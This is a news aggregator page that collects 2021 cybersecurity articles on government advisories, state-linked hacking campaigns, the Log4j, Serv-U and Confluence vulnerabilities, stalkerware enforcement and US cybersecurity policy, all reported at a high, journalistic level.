BigBrothers 2024 2023 2022 2021 2020
CISA, FBI and NSA Publish Joint Advisory and Scanner for Log4j Vulnerabilities
27.12.2021 BigBrothers Thehackernews
Cybersecurity agencies from Australia, Canada, New Zealand, the U.S., and the U.K. on Wednesday released a joint advisory in response to widespread exploitation of multiple vulnerabilities in Apache's Log4j software library by nefarious adversaries.
"These vulnerabilities, especially Log4Shell, are severe," the intelligence agencies said in the new guidance. "Sophisticated cyber threat actors are actively scanning networks to potentially exploit Log4Shell, CVE-2021-45046, and CVE-2021-45105 in vulnerable systems. These vulnerabilities are likely to be exploited over an extended period."
An attacker can exploit Log4Shell (CVE-2021-44228) by submitting a specially crafted request to a vulnerable system that causes that system to execute arbitrary code. CVE-2021-45046, on the other hand, allows for remote code execution in certain non-default configurations, while CVE-2021-45105 could be leveraged by a remote attacker to cause a denial-of-service (DoS) condition.
Since the vulnerabilities became public knowledge this month, unpatched servers have come under siege from ransomware groups to nation-state hackers, who have used the attack vector as a conduit to gain access to networks to deploy Cobalt Strike beacons, cryptominers, and botnet malware.
The U.S. Federal Bureau of Investigation's (FBI) assessment of the attacks has also raised the possibility that threat actors are incorporating the flaws into "existing cyber criminal schemes that are looking to adopt increasingly sophisticated obfuscation techniques." In light of the severity of the vulnerabilities and likely increased exploitation, organizations are being urged to identify, mitigate, and update affected assets as soon as possible.
To that end, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) has also released a scanner utility to identify systems vulnerable to the Log4Shell vulnerability, mirroring a similar tool released by the CERT Coordination Center (CERT/CC).
However, Israeli cybersecurity firm Rezilion, in an assessment published this week, found that commercial scanning tools were ill-equipped to detect all formats of the Log4j library in an environment due to the fact that the instances are often deeply nested in other code, revealing the "blindspots" in such utilities and the limitations of static scanning.
"The biggest challenge lies in detecting Log4Shell within packaged software in production environments: Java files (such as Log4j) can be nested a few layers deep into other files — which means that a shallow search for the file won't find it," Yotam Perkal, vulnerability research lead at Rezilion, said. "Furthermore, they may be packaged in many different formats which creates a real challenge in digging them inside other Java packages."
The public disclosure of Log4Shell has also led a number of technology suppliers to deploy patches for software that contain the flaw. The latest companies to issue updates are NVIDIA and HPE, joining a long list of vendors that have published security advisories detailing the products that are affected by the vulnerability.
The latest step taken by the governments arrives as the Apache Software Foundation (ASF) on Monday released updates for Apache HTTP Server to address two flaws — CVE-2021-44790 (CVSS score: 9.8) and CVE-2021-44224 (CVSS score: 8.2) — the former of which could be weaponized by a remote attacker to execute arbitrary code and take control of an affected system.
China suspends deal with Alibaba for not sharing Log4j 0-day first with the government
27.12.2021 BigBrothers Thehackernews
China's internet regulator, the Ministry of Industry and Information Technology (MIIT), has temporarily suspended a partnership with Alibaba Cloud, the cloud computing subsidiary of e-commerce giant Alibaba Group, for six months on account of the fact that it failed to promptly inform the government about a critical security vulnerability affecting the broadly used Log4j logging library.
The development was disclosed by Reuters and South China Morning Post, citing a report from 21st Century Business Herald, a Chinese business-news daily newspaper.
"Alibaba Cloud did not immediately report vulnerabilities in the popular, open-source logging framework Apache Log4j2 to China's telecommunications regulator," Reuters said. "In response, MIIT suspended a cooperative partnership with the cloud unit regarding cybersecurity threats and information-sharing platforms."
Tracked as CVE-2021-44228 (CVSS score: 10.0) and codenamed Log4Shell or LogJam, the catastrophic security shortcoming allows malicious actors to remotely execute arbitrary code by getting a specially crafted string logged by the software.
Log4Shell came to light after Chen Zhaojun of Alibaba cloud security team sent an email alerting the Apache Software Foundation (ASF) on November 24 about the flaw, adding that it "has a major impact." But just as the fix was being put in place, details of the vulnerability were shared on a Chinese blogging platform by an unidentified actor on December 8, sending the Apache team scrambling to release a patch on December 10.
Post the bug's public disclosure, Log4Shell has been subjected to widespread exploitation by threat actors to take control of susceptible servers, thanks to the near-ubiquitous use of the library, which can be found in a variety of consumer and enterprise services, websites, and applications — as well as in operational technology products — that rely on it to log security and performance information.
In the ensuing days, further investigation into Log4j by the cybersecurity community has since uncovered three more weaknesses in the Java-based tool, prompting the project maintainers to ship a series of security updates to contain real-world attacks exploiting the flaws.
Israeli security firm Check Point noted that it has blocked over 4.3 million exploitation attempts so far, with 46% of those intrusions made by known malicious groups. "This vulnerability may cause the device to be remotely controlled, which will cause serious hazards such as theft of sensitive information and device service interruption," the MIIT had previously said in a public statement published on December 17, adding it was only made aware of the flaw on December 9, 15 days after the initial disclosure.
The pushback from MIIT arrives months after the Chinese government issued new stricter vulnerability disclosure regulations that mandate software and networking vendors affected with critical flaws, alongside entities or individuals engaged in network product security vulnerability discovery, to report them first-hand to the government authorities mandatorily within two days.
In September, the government also followed it up by launching "cyberspace security and vulnerability professional databases" for the reporting of security vulnerabilities in networks, mobile apps, industrial control systems, smart cars, IoT devices, and other internet products that could be targeted by threat actors.
Update: After China's internet security regulator dropped Alibaba Cloud from its cyber threat intelligence partnership for six months, the cloud computing company on Thursday said it would work towards improving its risk management and compliance, according to a new report from the South China Morning Post. Alibaba Cloud also said it did not fully comprehend the severity of the flaw and that it did not share the details with the government in a timely fashion.
CISA Issues Warning On Cyber Threats Targeting Water and Wastewater Systems
16.10.21 BigBrothers Thehackernews
The U.S. Cybersecurity Infrastructure and Security Agency (CISA) on Thursday warned of continued ransomware attacks aimed at disrupting water and wastewater facilities (WWS), highlighting five incidents that occurred between March 2019 and August 2021.
"This activity—which includes attempts to compromise system integrity via unauthorized access—threatens the ability of WWS facilities to provide clean, potable water to, and effectively manage the wastewater of, their communities," CISA, along with the Federal Bureau of Investigation (FBI), the Environmental Protection Agency (EPA), and the National Security Agency (NSA), said in a joint bulletin.
Citing spear-phishing, outdated operating systems and software, and control system devices running vulnerable firmware versions as the primary intrusion vectors, the agencies singled out five different cyber attacks from 2019 to early 2021 targeting the WWS Sector —
A former employee at Kansas-based WWS facility unsuccessfully attempted to remotely access a facility computer in March 2019 using credentials that hadn't been revoked
Compromise of files and potential Makop ransomware observed at a New Jersey-based WWS facility in September 2020
An unknown ransomware variant deployed against a Nevada-based WWS facility in March 2021
Introducing ZuCaNo ransomware onto a Maine-based WWS facility's wastewater SCADA computer in July 2021
A Ghost variant ransomware attack against a California-based WWS facility in August 2021
The advisory is notable in the wake of a February 2021 attack at a water treatment facility in Oldsmar where an intruder broke into a computer system and remotely changed a setting that drastically altered the levels of sodium hydroxide (NaOH) in the water supply, before it was spotted by a plant operator, who quickly took steps to reverse the remotely issued command.
In addition to requiring multi-factor authentication for all remote access to the operational technology (OT) network, the agencies have urged WWS facilities to limit remote access to only relevant users, implement network segmentation between IT and OT networks to prevent lateral movement, and incorporate abilities to failover to alternate control systems in the event of an attack.
Microsoft Warns of Iran-Linked Hackers Targeting US and Israeli Defense Firms
13.10.21 BigBrothers Thehackernews
An emerging threat actor likely supporting Iranian national interests has been behind a password spraying campaign targeting US, EU, and Israeli defense technology companies, with additional activity observed against regional ports of entry in the Persian Gulf as well as maritime and cargo transportation companies focused in the Middle East.
Microsoft is tracking the hacking crew under the moniker DEV-0343.
The intrusions, which were first observed in late July 2021, are believed to have targeted more than 250 Office 365 tenants, fewer than 20 of which were successfully compromised following a password spray attack — a type of brute force attack wherein the same password is cycled against different usernames to log into an application or a network in an effort to avoid account lockouts.
Indications thus far allude to the possibility that the activity is part of an intellectual property theft campaign aimed at government partners producing military-grade radars, drone technology, satellite systems, and emergency response communication systems with the likely goal of stealing commercial satellite images and proprietary information.
DEV-0343's Iranian connection is based on evidence of "extensive crossover in geographic and sectoral targeting with Iranian actors, and alignment of techniques and targets with another actor originating in Iran," researchers from Microsoft Threat Intelligence Center (MSTIC) and Digital Security Unit (DSU) said.
The password sprays emulate Firefox and Google Chrome browsers and rely on a series of unique Tor proxy IP addresses expressly used to obfuscate their operational infrastructure. Noting that the attacks peaked between Sunday and Thursday from 7:30 AM to 8:30 PM Iran Time (4:00 AM to 5:00 PM UTC), Microsoft said dozens to hundreds of accounts within an entity were targeted depending on the size.
The Redmond-based tech giant also pointed out the password spraying tool's similarities to that of "o365spray," an actively updated open-source utility aimed at Microsoft Office 365, and is now urging customers to enable multi-factor authentication to mitigate compromised credentials and prohibit all incoming traffic from anonymizing services wherever applicable.
"Gaining access to commercial satellite imagery and proprietary shipping plans and logs could help Iran compensate for its developing satellite program," the researchers said. "Given Iran's past cyber and military attacks against shipping and maritime targets, Microsoft believes this activity increases the risk to companies in these sectors."
New U.S. Government Initiative Holds Contractors Accountable for Cybersecurity
9.10.21 BigBrothers Thehackernews
The U.S. government on Wednesday announced the formation of a new Civil Cyber-Fraud Initiative that aims to hold contractors accountable for failing to meet required cybersecurity requirements in order to safeguard public sector information and infrastructure.
"For too long, companies have chosen silence under the mistaken belief that it is less risky to hide a breach than to bring it forward and to report it," said Deputy Attorney General Monaco in a press statement. "Well that changes today, [and] we will use our civil enforcement tools to pursue companies, those who are government contractors who receive federal funds, when they fail to follow required cybersecurity standards — because we know that puts all of us at risk."
The Civil Cyber-Fraud Initiative is part of the U.S. Justice Department's (DoJ) efforts to build resilience against cybersecurity intrusions and holding companies to task for deliberately providing deficient cybersecurity products or services, misrepresenting their cybersecurity practices or protocols, or violating their obligations to monitor and report cybersecurity incidents and breaches.
To that end, the government intends to utilize the False Claims Act (FCA) to go after contractors and grant recipients for cybersecurity-related fraud by failing to secure their networks and notify about security breaches adequately.
In addition, the DoJ also announced the launch of a National Cryptocurrency Enforcement Team (NCET) to dismantle criminal abuse of cryptocurrency platforms, particularly focusing on "crimes committed by virtual currency exchanges, mixing and tumbling services, and money laundering infrastructure actors."
The developments also come nearly a week after the U.S. Federal Communications Commission (FCC) laid out new rules to prevent subscriber identity module (SIM) swapping scams and port-out fraud, both of which are tactics orchestrated to transfer users' phone numbers and service to a different number and carrier under the attacker's control.
The FCC's proposal would require amending existing Customer Proprietary Network Information (CPNI) and Local Number Portability rules to mandate wireless carriers to adopt secure methods of confirming the customer's identity before transferring their phone number to a new device or carrier. On top of that, the changes also suggest requiring providers to immediately notify customers whenever a SIM change or port request is made on their accounts.
Cybersecurity Firm Group-IB's CEO Arrested Over Treason Charges in Russia
6.10.21 BigBrothers Thehackernews
Russian authorities on Wednesday arrested and detained Ilya Sachkov, the founder of cybersecurity firm Group-IB, for two months in Moscow on charges of state treason following a search of its office on September 28.
The Russian company, which is headquartered in Singapore, confirmed the development but noted the "reason for the search was not yet clear," adding "The decentralized infrastructure of Group-IB allows us to keep our customer's data safe, maintain business operations and work without interruption across our offices in Russia and around the world."
Group IB said the raids at its Moscow office had commenced on Tuesday, with law enforcement authorities leaving that same evening. Kremlin Spokesman Dmitry Peskov said the government was aware of the arrest but that it had no additional details about the case, Russian state news agency TASS reported.
The cybersecurity company relocated to Singapore in late 2018 as part of its attempts to distance itself from any ties to the Russian government. It's worth noting that the U.S. Department of Homeland Security banned Kaspersky products from all government departments on September 13 2017, alleging that the company had worked on secret projects with Russia's Federal Security Service (FSB).
Group-IB is known for its assistance in a number of law enforcement operations spanning Europe, often collaborating agencies such as Europol and Interpol on investigations that have led to the arrest of several organized cybercrime groups in recent years, including Fraud Family, Dr HeX, and three Nigerian nationals suspected of perpetrating business email compromise (BEC) scams.
If convicted of treason, Sachkov could be punishable by up to 20 years in prison.
3 Former U.S. Intelligence Officers Admit to Hacking for UAE Company
19.9.21 BigBrothers Thehackernews
The U.S. Department of Justice (DoJ) on Tuesday disclosed it fined three intelligence community and military personnel $1.68 million in penalties for their role as cyber-mercenaries working on behalf of a U.A.E.-based cybersecurity company.
The trio in question — Marc Baier, 49, Ryan Adams, 34, and Daniel Gericke, 40 — are accused of "knowingly and willfully combine, conspire, confederate, and agree with each other to commit offenses, "furnishing defense services to persons and entities in the country over a three year period beginning around December 2015 and continuing through November 2019, including developing invasive spyware capable of breaking into mobile devices without any action by the targets.
"The defendants worked as senior managers at a United Arab Emirates (U.A.E.)-based company (U.A.E. CO) that supported and carried out computer network exploitation (CNE) operations (i.e., 'hacking') for the benefit of the U.A.E. government," the DoJ said in a statement.
"Despite being informed on several occasions that their work for [the] U.A.E. CO, under the International Traffic in Arms Regulations (ITAR), constituted a 'defense service' requiring a license from the State Department's Directorate of Defense Trade Controls (DDTC), the defendants proceeded to provide such services without a license."
Besides charging the individuals for violations of U.S. export control, computer fraud and access device fraud laws, the hackers-for-hire are alleged to have supervised the creation of sophisticated 'zero-click' exploits that were subsequently weaponized to illegally amass credentials for online accounts issued by U.S. companies, and to obtain unauthorized access to mobile phones around the world.
The development follows a prior investigation by Reuters in 2019, which revealed how former U.S. National Security Agency (NSA) operatives helped the U.A.E. surveil prominent Arab media figures, dissidents, and several unnamed U.S. journalists as part of a clandestine operation dubbed Project Raven undertaken by a cybersecurity company named DarkMatter. The company's propensity to recruit "cyberwarriors from abroad" to research offensive security techniques first came to light in 2016.
The deep-dive report also detailed a zero-click exploit called Karma that made it possible to remotely hack into iPhones of activists, diplomats and rival foreign leaders "simply by uploading phone numbers or email accounts into an automated targeting system." The sophisticated tool was used to retrieve photos, emails, text messages and location information from the victims' phones as well as harvest saved passwords, which could be abused to stage further intrusions.
According to unsealed court documents, Baier, Adams and Gericke designed, implemented, and used Karma for foreign intelligence gathering purposes starting in May 2016 after obtaining an exploit from an unnamed U.S. company that granted zero-click remote access to Apple devices. But after the underlying security weakness was plugged in September, the defendants allegedly contacted another U.S. firm to acquire a second exploit that utilized a different vulnerability in iOS, ultimately using it to rearchitect and modify the Karma exploitation toolkit.
The charges also arrive a day after Apple divulged that it acted to close a zero-day vulnerability (CVE-2021-30860) exploited by NSO Group's Pegasus spyware to target activists in Bahrain and Saudi Arabia.
"The FBI will fully investigate individuals and companies that profit from illegal criminal cyber activity," said Assistant Director Bryan Vorndran of the FBI's Cyber Division. "This is a clear message to anybody, including former U.S. government employees, who had considered using cyberspace to leverage export-controlled information for the benefit of a foreign government or a foreign commercial company – there is risk, and there will be consequences."
Update: A new report from MIT Technology Review has now revealed that the vulnerability that the KARMA platform leveraged to take full control of a target's iPhone was in Apple's iMessage app and that the exploit was developed and sold by an American company named Accuvant, which has since merged with Optiv.
"Accuvant sold hacking exploits to multiple customers in both governments and the private sector, including the United States and its allies — and this exact iMessage exploit was also sold simultaneously to multiple other customers," the report said.
In a separate development, VPN provider ExpressVPN said it was aware of Daniel Gericke's previous employment before hiring him. Gericke, who is currently the Chief Information Officer at the company, is one the three individuals who have been implicated for their unlicensed work as mercenary hackers directing U.A.E.-funded intrusion campaigns.
"We've known the key facts relating to Daniel's employment history since before we hired him, as he disclosed them proactively and transparently with us from the start," the company said in a statement. "In fact, it was his history and expertise that made him an invaluable hire for our mission to protect users' privacy and security."
Experts Link Sidewalk Malware Attacks to Grayfly Chinese Hacker Group
10.9.21 BigBrothers Thehackernews
A previously undocumented backdoor that was recently found targeting an unnamed computer retail company based in the U.S. has been linked to a longstanding Chinese espionage operation dubbed Grayfly.
In late August, Slovakian cybersecurity firm ESET disclosed details of an implant called SideWalk, which is designed to load arbitrary plugins sent from an attacker-controlled server, gather information about running processes in the compromised systems, and transmit the results back to the remote server.
The cybersecurity firm attributed the intrusion to a group it tracks as SparklingGoblin, an adversary believed to be connected to the Winnti (aka APT41) malware family.
But latest research published by researchers from Broadcom's Symantec has pinned the SideWalk backdoor on the China-linked espionage group, pointing out the malware's overlaps with the older Crosswalk malware, with the latest Grayfly hacking activities singling out a number of organizations in Mexico, Taiwan, the U.S., and Vietnam.
"A feature of this recent campaign was that a large number of targets were in the telecoms sector. The group also attacked organizations in the IT, media, and finance sectors," Symantec's Threat Hunter Team said in a write-up published on Thursday.
Known to be active at least since March 2017, Grayfly functions as the "espionage arm of APT41" notorious for targeting a variety of industries in pursuit of sensitive data by exploiting publicly facing Microsoft Exchange or MySQL web servers to install web shells for initial intrusion, before spreading laterally across the network and install additional backdoors that enable the threat actor to maintain remote access and exfiltrate amassed information.
In one instance observed by Symantec, the adversary's malicious cyber activity commenced with targeting an internet reachable Microsoft Exchange server to gain an initial foothold into the network. This was followed by executing a string of PowerShell commands to install an unidentified web shell, ultimately leading to the deployment of the Sidewalk backdoor and a custom variant of the Mimikatz credential-dumping tool that's been put to use in previous Grayfly attacks.
"Grayfly is a capable actor, likely to continue to pose a risk to organizations in Asia and Europe across a variety of industries, including telecommunications, finance, and media," the researchers said. "It's likely this group will continue to develop and improve its custom tools to enhance evasion tactics along with using commodity tools such as publicly available exploits and web shells to assist in their attacks."
Microsoft Says Chinese Hackers Were Behind SolarWinds Serv-U SSH 0-Day Attack
5.9.21 BigBrothers Thehackernews
Microsoft has shared technical details about a now-fixed, actively exploited critical security vulnerability affecting SolarWinds Serv-U managed file transfer service that it has attributed with "high confidence" to a threat actor operating out of China.
In mid-July, the Texas-based company remedied a remote code execution flaw (CVE-2021-35211) that was rooted in Serv-U's implementation of the Secure Shell (SSH) protocol, which could be abused by attackers to run arbitrary code on the infected system, including the ability to install malicious programs and view, change, or delete sensitive data.
"The Serv-U SSH server is subject to a pre-auth remote code execution vulnerability that can be easily and reliably exploited in the default configuration," Microsoft Offensive Research and Security Engineering team said in a detailed write-up describing the exploit.
"An attacker can exploit this vulnerability by connecting to the open SSH port and sending a malformed pre-auth connection request. When successfully exploited, the vulnerability could then allow the attacker to install or run programs, such as in the case of the targeted attack we previously reported," the researchers added.
While Microsoft linked the attacks to DEV-0322, a China-based collective citing "observed victimology, tactics, and procedures," the company has now revealed that the remote, pre-auth vulnerability stemmed from the manner the Serv-U process handled access violations without terminating the process, thereby making it simple to pull off stealthy, reliable exploitation attempts.
"The exploited vulnerability was caused by the way Serv-U initially created an OpenSSL AES128-CTR context," the researchers said. "This, in turn, could allow the use of uninitialized data as a function pointer during the decryption of successive SSH messages."
"Therefore, an attacker could exploit this vulnerability by connecting to the open SSH port and sending a malformed pre-auth connection request. We also discovered that the attackers were likely using DLLs compiled without address space layout randomization (ASLR) loaded by the Serv-U process to facilitate exploitation," the researchers added.
ASLR refers to a protection mechanism that's used to increase the difficulty of performing a buffer overflow attack by randomly arranging the address space positions where system executables are loaded into memory.
Microsoft, which disclosed the attack to SolarWinds, said it recommended enabling ASLR compatibility for all binaries loaded in the Serv-U process. "ASLR is a critical security mitigation for services which are exposed to untrusted remote inputs, and requires that all binaries in the process are compatible in order to be effective at preventing attackers from using hardcoded addresses in their exploits, as was possible in Serv-U," the researchers said.
If anything, the revelations highlight the variety of techniques and tools used by threat actors to breach corporate networks, including piggybacking on legitimate software.
Back in December 2020, Microsoft disclosed that a separate espionage group may have been taking advantage of the IT infrastructure provider's Orion software to drop a persistent backdoor called Supernova on infected systems. Cybersecurity firm Secureworks connected the intrusions to a China-linked threat actor called Spiral.
U.S. Cyber Command Warns of Ongoing Attacks Exploiting Atlassian Confluence Flaw
5.9.21 BigBrothers Thehackernews
The U.S. Cyber Command on Friday warned of ongoing mass exploitation attempts in the wild targeting a now-patched critical security vulnerability affecting Atlassian Confluence deployments that could be abused by unauthenticated attackers to take control of a vulnerable system.
"Mass exploitation of Atlassian Confluence CVE-2021-26084 is ongoing and expected to accelerate," the Cyber National Mission Force (CNMF) said in a tweet. The warning was also echoed by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) and Atlassian itself in a series of independent advisories.
Bad Packets noted on Twitter it "detected mass scanning and exploit activity from hosts in Brazil, China, Hong Kong, Nepal, Romania, Russia and the U.S. targeting Atlassian Confluence servers vulnerable to remote code execution."
Atlassian Confluence is a widely popular web-based documentation platform that allows teams to create, collaborate, and organize on different projects, offering a common platform to share information in corporate environments. It counts several major companies, including Audi, Docker, GoPro, Hubspot, LinkedIn, Morningstar, NASA, The New York Times, and Twilio, among its customers.
The development comes days after the Australian company rolled out security updates on August 25 for a OGNL (Object-Graph Navigation Language) injection flaw that, in specific instances, could be exploited to execute arbitrary code on a Confluence Server or Data Center instance.
Put differently, an adversary can leverage this weakness to execute any command with the same permissions as the user running the service, and worse, abuse the access to gain elevated administrative permissions to stage further attacks against the host using unpatched local vulnerabilities.
The flaw, which has been assigned the identifier CVE-2021-26084 and has a severity rating of 9.8 out of 10 on the CVSS scoring system, impacts all versions prior to 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.
The issue has been addressed in the following versions —
6.13.23
7.4.11
7.11.6
7.12.5
7.13.0
In the days since the patches were issued, multiple threat actors have seized the opportunity to capitalize on the flaw by ensnaring potential victims to mass scan vulnerable Confluence servers and install crypto miners after a proof-of-concept (PoC) exploit was publicly released earlier this week. Rahul Maini, one of the researchers involved, described the process of developing the CVE-2021-26084 exploit as "relatively simpler than expected."
FTC Bans Stalkerware App SpyFone; Orders Company to Erase Secretly Stolen Data
3.9.21 BigBrothers Thehackernews
The U.S. Federal Trade Commission on Wednesday banned a stalkerware app company called SpyFone from the surveillance business over concerns that it stealthily harvested and shared data on people's physical movements, phone use, and online activities that were then used by stalkers and domestic abusers to monitor potential targets.
"SpyFone is a brazen brand name for a surveillance business that helped stalkers steal private information," said Samuel Levine, acting director of the FTC's Bureau of Consumer Protection, in a statement. "The stalkerware was hidden from device owners, but was fully exposed to hackers who exploited the company's slipshod security. This case is an important reminder that surveillance-based businesses pose a significant threat to our safety and security."
Calling out the app developers for its lack of basic security practices, the agency has also ordered SpyFone to delete the illegally harvested information and notify device owners that the app had been secretly installed on their phones.
SpyFone's website advertises the company as the "World's Leading Spy Phone App," and claims five million installations. Like other stalkerware services, SpyFone allowed purchasers to surreptitiously track photos, text messages, emails, internet browsing histories, real-time GPS locations, and other personal information stored in the devices, with the apps equipped with features that make it possible to remove the app's icon from appearing on the mobile device's home screen so as to hide the fact that the victim is being monitored.
On top of that, the company is said to have not implemented adequate protections to secure amassed data, thus leaving the personal information it stored unencrypted, in addition to exposing the data over the internet without any authentication and transmitting purchasers' passwords in plaintext. Notably, the company suffered a data breach in August 2018 after a researcher accessed the company's poorly-protected Amazon S3 bucket and obtained the personal data of roughly 2,200 consumers.
The development comes almost two years after the FTC barred Retina-X and its developers from selling stalkerware apps that were illegitimately used to spy on employees and children and installed on the victims' devices without their knowledge or permission by circumventing smartphone manufacturer restrictions, thereby exposing the devices to security vulnerabilities and likely invalidated manufacturer warranties.
CISA Adds Single-Factor Authentication to the List of Bad Practices
3.9.21 BigBrothers Thehackernews
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Monday added single-factor authentication to the short list of "exceptionally risky" cybersecurity practices that could expose critical infrastructure as well as government and the private sector entities to devastating cyberattacks.
Single-factor authentication is a method of signing in users to websites and remote systems by using only one way of verifying their identity, typically a combination of username and password. It's considered to be of low-security, since it heavily relies on "matching one factor — such as a password — to a username to gain access to a system."
But with weak, reused, and common passwords posing a grave threat and emerging a lucrative attack vector, the use of single-factor authentication can lead to unnecessary risk of compromise and increase the possibility of account takeover by cybercriminals.
With the latest development, the list of bad practices now encompasses —
Use of unsupported (or end-of-life) software
Use of known/fixed/default passwords and credentials, and
Use of single-factor authentication for remote or administrative access to systems
"Although these Bad Practices should be avoided by all organizations, they are especially dangerous in organizations that support Critical Infrastructure or National Critical Functions," CISA said.
"The presence of these Bad Practices in organizations that support Critical Infrastructure or NCFs is exceptionally dangerous and increases risk to our critical infrastructure, on which we rely for national security, economic stability, and life, health, and safety of the public," the agency noted.
Furthermore, CISA is considering adding a number of other practices to the catalog, including —
Using weak cryptographic functions or key sizes
Flat network topologies
Mingling of IT and OT networks
Everyone's an administrator (lack of least privilege)
Utilization of previously compromised systems without sanitization
Transmission of sensitive, unencrypted / unauthenticated traffic over uncontrolled networks, and
Poor physical controls
ShadowPad Malware is Becoming a Favorite Choice of Chinese Espionage Groups
20.8.21 BigBrothers Thehackernews
ShadowPad, an infamous Windows backdoor that allows attackers to download further malicious modules or steal data, has been put to use by five different Chinese threat clusters since 2017.
"The adoption of ShadowPad significantly reduces the costs of development and maintenance for threat actors," SentinelOne researchers Yi-Jhen Hsieh and Joey Chen said in a detailed overview of the malware, adding "some threat groups stopped developing their own backdoors after they gained access to ShadowPad."
The American cybersecurity firm dubbed ShadowPad a "masterpiece of privately sold malware in Chinese espionage."
A successor to PlugX and a modular malware platform since 2015, ShadowPad catapulted to widespread attention in the wake of supply chain incidents targeting NetSarang, CCleaner, and ASUS, leading the operators to shift tactics and update their defensive measures with advanced anti-detection and persistence techniques.
More recently, attacks involving ShadowPad have singled out organizations in Hong Kong as well as critical infrastructure in India, Pakistan, and other Central Asian countries. Although primarily attributed to APT41, the implant is known to be shared among several Chinese espionage actors such as Tick, RedEcho, RedFoxtrot, and clusters dubbed Operation Redbonus, Redkanku, and Fishmonger.
"[The threat actor behind Fishmonger is] now using it and another backdoor called Spyder as their primary backdoors for long-term monitoring, while they distribute other first-stage backdoors for initial infections including FunnySwitch, BIOPASS RAT, and Cobalt Strike," the researchers said. "The victims include universities, governments, media sector companies, technology companies and health organizations conducting COVID-19 research in Hong Kong, Taiwan, India and the U.S."
The malware functions by decrypting and loading a Root plugin in memory, which takes care of loading other embedded modules during runtime, in addition to dynamically deploying supplementary plugins from a remote command-and-control (C2) server, enabling adversaries to incorporate extra functionality not built into the malware by default. At least 22 unique plugins have been identified to date.
The infected machines, for their part, are commandeered by a Delphi-based controller that's used for backdoor communications, updating the C2 infrastructure, and managing the plugins.
Interestingly, the feature set made available to ShadowPad users is not only tightly controlled by its seller, each plugin is sold separately instead of offering a full bundle containing all of the modules, with most samples — out of about 100 — embedded with less than nine plugins.
"The emergence of ShadowPad, a privately sold, well-developed and functional backdoor, offers threat actors a good opportunity to move away from self-developed backdoors," the researchers said. "While it is well-designed and highly likely to be produced by an experienced malware developer, both its functionalities and its anti-forensics capabilities are under active development."
Hackers disrupted live broadcasts at Channel Nine. Is it a Russian retaliation?
29.3.2021 BigBrothers Securityaffairs
A cyber attack has disrupted the Australian Channel Nine’s live broadcasts, the company was unable to transmit its Sunday morning news program.
A cyber attack has hit the Australian Channel Nine’s live broadcasts causing the disruption of its operations. The broadcaster was unable to air its Sunday morning news program, which runs from 7:00 am to 1:00 pm from Sidney.
The 5:00pm news program, which is transmitted from Melbourne, did not go to air too.
“We wish to inform you there has been a cyber attack on our systems which has disrupted live broadcasts out of Nine Sydney,” reads an email sent by the company to staff. “Our IT teams are working around the clock to fully restore our systems which have primarily affected our broadcast and corporate business units.”
The company confirmed that the unprecedented cyberattack impacted the Nine IT network, while its email systems did not appear to be affected.
The internal staff worked hard to resume the normal broadcast schedule, the 6:00 pm news program went regularly to air from the studio in Melbourne. The broadcaster hopes to completely resume all its programs by Monday morning, meantime it asked its personnel to work from home.
“A source, who did not want to be identified as he was not allowed to speak to media, said Nine management had informed staff that a “malicious” cyber attack was suspected to be the cause.” reported ABC news. “The Australian Financial Review, which is also owned by Nine, also reported that the media company was likely the target of a cyber attack, the effects of which could last beyond Sunday.”
In an update to Melbourne viewers, Nine’s Alicia Loxley confirmed that the broadcaster was hit with a massive ransomware attack.
“Cyber hackers have targeted Channel Nine in a massive ransomware attack bringing down its network Australia-wide. No-one has claimed responsibility for the bug but IT experts are working to bring systems back on-line.” said Loxley.
According to TV Blackbox, the attacks launched by Russian hackers with the intent to prevent that Monday’s episode of Under Investigation, which focuses on Russian president Vladimir Putin, will go to air.
However, the episode of Under Investigation is pre-recorded and will go to air as planned on Monday.
A circumstance that suggests that Channel Nine was the victim of a retaliatory act is that sources told TV Blackbox there have been no demands for money, and this is very unusual for a ransomware attack.
US Gov Executive Order would oblige to disclose security breach impacting gov users
29.3.2021 BigBrothers Securityaffairs
According to a proposed executive order of the Biden administration, software vendors would have to disclose breaches to U.S. government users.
The Reuters agency revealed that an executive order proposed by the Biden administration will oblige software vendors to notify their federal government customers in case they will suffer a security breach.
The executive order is expected to be released the next week and will also require federal agencies to enhance their security posture through the implementation of measures such as multi-factor authentication and data encryption. The order seems to be part of the response of the US government to the recently disclosed SolarWinds supply chain attack.
“A planned Biden administration executive order will require many software vendors to notify their federal government customers when the companies have a cybersecurity breach, according to a draft seen by Reuters.” reads the report published by Reuters. “A National Security Council spokeswoman said no decision has been made on the final content of the executive order. The order could be released as early as next week.”
When the security breach will impact critical programs, the vendors might be forced to provide a “software bill of materials.”
The order will force victims of a security breach to work with the FBI and the Homeland Security Department’s Cybersecurity and Infrastructure Security Agency to respond to incidents.
The order would also force the creation of a cybersecurity incident response board composed of representatives from federal agencies and private cybersecurity companies.
“The draft order would also create a cybersecurity incident response board, with representatives from federal agencies and cybersecurity companies. The forum would encourage vendors and victims to share information, perhaps with a combination of incentives and liability protections.” concludes Reuters.
Executive Order Would Strengthen Cybersecurity Requirements for Federal Agencies
27.3.2021 BigBrothers Threatpost
The post-SolarWinds EO could be issued as soon as next week, according to a report.
The U.S. federal government is mulling changes to up its cybersecurity software game in the wake of the sprawling SolarWinds cyberattacks that came to light in December, including requiring data-breach notifications.
In a draft executive order from President Joe Biden, software companies would be required to disclose any security issues to government users, according to a report from Reuters.
“The federal government needs to be able to investigate and remediate threats to the services it provides the American people early and quickly,” a spokeswoman for the National Security Council told the outlet. Referring to the SolarWinds incident, she noted that, “Simply put, you can’t fix what you don’t know about.”
In that campaign, adversaries were able to use SolarWinds’ Orion network management platform to infect targets by pushing out a custom backdoor called Sunburst via trojanized product updates. Sunburst was delivered to almost 18,000 organizations around the globe, starting last March, before being discovered in December. With Sunburst embedded, the attackers were then able to pick and choose which organizations to further penetrate, in a massive cyberespionage campaign that has hit nine U.S. government agencies, tech companies like Microsoft and 100 others hard.
The other draft cybersecurity orders in the EO, according to Reuters, include requiring a “software bill of materials” for all packages in use across the government, detailing the source of all code, including open-source and partner pieces. And, it would mandate the use of multifactor authentication and data encryption for federal agencies.
The order as it now stands would also require vendors to keep digital records and work with the FBI and the Cybersecurity and Infrastructure Security Agency (CISA) on incident response, according to the report.
